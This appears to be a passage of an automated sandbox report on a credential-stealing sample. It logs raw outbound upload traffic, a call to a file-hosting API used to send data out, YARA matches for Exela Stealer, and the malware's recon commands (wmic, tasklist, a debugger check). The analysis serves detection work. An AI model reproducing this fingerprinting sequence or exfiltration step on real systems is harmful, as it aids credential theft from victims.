                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 6d 3d 7c 40 48 da 68 ec ad 5f 56 38 9f 41 f5 e7 fc c4 bf 9a 4a 21 47 1a 27 14 d3 53 6a 2c 50 8b c2 7b 8f 54 89 9a a1 10 36 7c 8a 39 76 5f 5e 74 9c 98 09 5d 4c ec 92 6e 9d c2 e9 71 cf f5 7b 72 cf 5d ba 41 fb 60 76 87 70 ba c0 81 25 9a 14 7e f2 cb 12 98 3d 79 8d df d9 3e f1 76 82 86 68 59 a2 51 c4 83 fd 7a 83 04 db e7 ff 7c 17 ed 30 30 02 da a5 39 14 4f ee cc 6d fa 30 89 ac bd 9f da f4 78 b6 5f 5f f8 59 85 ca 63 09 10 2a bd ad 81 d9 d0 8d e2 99 41 15 fc 34 65 d3 43 6b a3 65 6f d0 27 08 e5 7b a0 3f 83 42 ee b1 f5 61 1f 1d fd 60 cf 75 f0 f5 d7 41 64 10 fb 51 d6 ad 08 b5 84 56 1e f7 19 d9 83 d7 5f 5f dc ba 92 f9 3c 3c c6 58 44 f7 15 13 52 a8 ec 9d d5 1f 4f 0f 0c 15 d5 36 56 af d8 8a 91 5e b6 89 b6 4f 89 bf 40 16 a6 dc 6a b3 a4 09 4b 5a 0a 79 4a ed 94 df f6 22
                                                                                                                                                                                                                                  Data Ascii: m=|@Hh_V8AJ!G'Sj,P{T6|9v_^t]Lnq{r]A`vp%~=y>vhYQz|009Om0x__Yc*A4eCkeo'{?Ba`uAdQV__<<XDRO6V^O@jKZyJ"
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: 83 13 08 0b af f2 e9 80 ae a2 71 e9 79 9f b2 e3 a9 e0 e1 58 d8 51 8e 32 f0 16 70 58 56 03 4a c7 a5 b5 38 ab 28 02 87 fe 03 73 c4 8e f4 28 cb 56 97 c9 12 1a 07 8e f6 21 d4 56 47 d2 22 9f 44 4d 01 0f ff 32 29 3e e9 6b 21 bb 9a f9 a0 cf 64 e9 47 10 53 8d 3f c9 d0 79 ee df 4e b9 3e 38 8e e3 4c da f9 74 93 72 b1 38 f6 7a 4b f5 7b a7 55 e3 2a 38 24 15 78 55 d1 61 ff 4b 28 20 69 eb 43 10 57 81 b0 ed 8c 44 31 d4 b7 94 63 f5 4e 07 0e 16 76 bf 6c 6e 24 4d 75 f5 6f 5a c7 13 3d 5e a2 59 c9 4e 75 b0 2c af 39 8e ce 2a 31 42 a6 9d 80 91 0b 5b 12 f2 17 ce fa 18 fd 51 d6 b3 7d 13 46 7e bd 9c 52 7e 2d 9d a6 ca 95 11 d9 63 52 2c ab 49 19 6c a5 a4 19 21 c4 a3 65 c6 1b 9d 7e 75 56 c5 e4 10 94 23 10 7f 45 a4 cb 2c 72 f3 49 f8 f2 1a 5c 4d cb d9 f6 5a 36 c5 1b ec 15 fd 08 a2 bc
                                                                                                                                                                                                                                  Data Ascii: qyXQ2pXVJ8(s(V!VG"DM2)>k!dGS?yN>8Ltr8zK{U*8$xUaK( iCWD1cNvln$MuoZ=^YNu,9*1B[Q}F~R~-cR,Il!e~uV#E,rI\MZ6
                                                                                                                                                                                                                                  2024-10-28 07:20:34 UTC16384OUTData Raw: d7 3b ed 84 d6 12 96 9d 22 ef 17 43 02 5e 78 a0 16 1e a6 fe a7 f3 f6 db e9 ae b5 aa ff 0e f0 b7 ec a3 4e 5a 8d 22 9d 21 b9 f5 8b 60 d1 b1 b0 7f b3 0b 55 96 78 ea 7c c2 5d 15 89 26 75 58 44 c4 0f c5 98 c5 b8 8d 9e 0b b3 05 1c d7 bc 60 3b 5d c0 0a 25 f0 e8 03 97 ff 29 a1 49 7d 9d d3 bc 75 1b 52 23 54 14 74 3e ae 21 1c 36 98 4f 00 fa ef ee d4 bc cd 95 af db 4c 50 d8 c3 e2 3e 4d 12 8f 9a 5e 7b da 34 1c 04 2e 7f 18 f6 05 92 4b 73 47 01 cf 93 7e 46 da f9 39 f1 ae ee e6 29 49 d1 28 f2 64 38 29 16 77 1e 9e 57 6b b2 e4 8d b8 0b d2 d4 3f 33 29 8a dc 0f 43 f1 70 1c a4 38 7d 1b 39 b0 85 e2 71 5c 49 05 5a b5 25 63 af 63 0b 25 85 9b 3e 93 50 40 f1 2f 94 be 96 34 77 6c 9e 75 99 a5 c2 15 02 d6 f6 b5 94 98 b1 f4 ee 74 20 a3 9c 91 d7 b3 d1 e1 70 13 c5 3c 58 58 5f 29 5d 19
                                                                                                                                                                                                                                  Data Ascii: ;"C^xNZ"!`Ux|]&uXD`;]%)I}uR#Tt>!6OLP>M^{4.KsG~F9)I(d8)wWk?3)Cp8}9q\IZ%cc%>P@/4wlut p<XX_)]
                                                                                                                                                                                                                                  2024-10-28 07:20:35 UTC940INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 07:20:35 GMT
                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                  x-ratelimit-limit: 5
                                                                                                                                                                                                                                  x-ratelimit-remaining: 4
                                                                                                                                                                                                                                  x-ratelimit-reset: 1730100036
                                                                                                                                                                                                                                  x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                                  via: 1.1 google
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T3hCOnw7HOABa%2Bp1MTK8VhsBthkSATk1e%2FKSUZJ1LOsr8l5W%2F3oJUJ9nmN1ZgD5Q3A5nBNIVII8vX7Cwp6vwyug%2BLTa%2BH%2B5bPtU7mdbeGh6DWAcATVSKi0ayh%2FPk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8d9929fd3fcc6b34-DFW


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  3192.168.2.64977445.112.123.1264437112C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-10-28 07:20:36 UTC134OUTGET /getServer HTTP/1.1
                                                                                                                                                                                                                                  Host: api.gofile.io
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Python/3.10 aiohttp/3.10.10
                                                                                                                                                                                                                                  2024-10-28 07:20:36 UTC1113INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Server: nginx/1.27.1
                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 07:20:36 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                  Content-Length: 14
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                  Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                                                                                                                                                  X-Download-Options: noopen
                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
                                                                                                                                                                                                                                  2024-10-28 07:20:36 UTC14INData Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
                                                                                                                                                                                                                                  Data Ascii: error-notFound


                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:03:20:07
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7b2b60000
                                                                                                                                                                                                                                  File size:9'934'907 bytes
                                                                                                                                                                                                                                  MD5 hash:AECB2C382B2181620AA3243DCBCA51C8
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:03:20:08
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe"
                                                                                                                                                                                                                                  Imagebase:0x7ff7b2b60000
                                                                                                                                                                                                                                  File size:9'934'907 bytes
                                                                                                                                                                                                                                  MD5 hash:AECB2C382B2181620AA3243DCBCA51C8
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000002.2447462615.0000018B4A0B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2446198201.0000018B48D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2445634123.0000018B48390000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2433574668.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2430757947.0000018B489E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2426963999.0000018B487FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2447358540.0000018B49FB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.2426890753.0000018B47BF3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "gdb --version"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic computersystem get Manufacturer
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                  Start time:03:20:10
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                  Imagebase:0x7ff792ef0000
                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                  Start time:03:20:11
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                  Start time:03:20:11
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                  Start time:03:20:11
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:wmic path Win32_ComputerSystem get Manufacturer
                                                                                                                                                                                                                                  Imagebase:0x7ff73e070000
                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                  Start time:03:20:12
                                                                                                                                                                                                                                  Start date:28/10/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                  Imagebase:0x7ff73cdb0000
                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

